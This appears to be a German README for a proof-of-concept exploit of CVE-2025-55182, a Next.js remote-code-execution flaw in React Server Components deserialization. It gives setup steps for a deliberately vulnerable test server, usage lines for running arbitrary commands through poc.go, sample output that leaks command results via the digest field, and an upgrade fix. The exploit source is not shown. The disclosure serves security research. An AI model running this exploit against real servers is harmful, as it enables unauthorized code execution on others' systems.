
Proof-of-concept-Exploit für CVE-2025-55182, eine Next.js-RCE-Sicherheitslücke durch unsichere Deserialisierung in RSC-Anfragen. Enthält ein Go-basiertes POC-Skript und einen anfälligen Testserver für Sicherheitsforschung und -bildung.
⚠️ Dieses Tool ist nur für Sicherheitsforschung und Lehrzwecke bestimmt. Nicht für illegale Zwecke verwenden. ⚠️
CVE-2025-55182 ist eine schwerwiegende Remote Code Execution (RCE)-Schwachstelle im Next.js-Framework. Die Schwachstelle resultiert aus unsicheren Deserialisierungsproblemen beim Verarbeiten von React Server Components (RSC)-Anfragen. Angreifer können durch das Erstellen bösartiger HTTP-Anfragen ohne Autorisierung beliebigen Code auf dem Server ausführen.
Betroffene Versionen:
Dieses Projekt stellt einen angreifbaren Next.js-Testserver test-server bereit.
Stelle sicher, dass Node.js und npm installiert sind.
cd test-server
npm install
npm run dev
Der Server läuft standardmäßig unter http://localhost:3000.
Hinweis: Wenn ein Lock-Fehler auftritt, versuche Folgendes auszuführen:
rm -f .next/dev/lock && npm run dev
Dieses Projekt stellt ein Go-POC-Skript poc.go bereit.
Verwendung:
go run poc.go [Ziel-URL] [auszuführender Befehl]
Beispiele:
Ausführen des id-Befehls (Standard)
go run poc.go
oder
go run poc.go http://localhost:3000 id
Anzeigen von Dateien im aktuellen Verzeichnis
go run poc.go http://localhost:3000 "ls -la"
Anzeigen des Dateiinhalts
go run poc.go http://localhost:3000 "cat package.json"
Erwartete Ausgabe:
Obwohl der HTTP-Statuscode 500 zurückgegeben wird, sind die Ergebnisse der Befehlsausführung im digest-Feld der Antwort enthalten.
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}
Aktualisiere Next.js auf eine sichere Version:
npm install next@latest react@latest react-dom@latest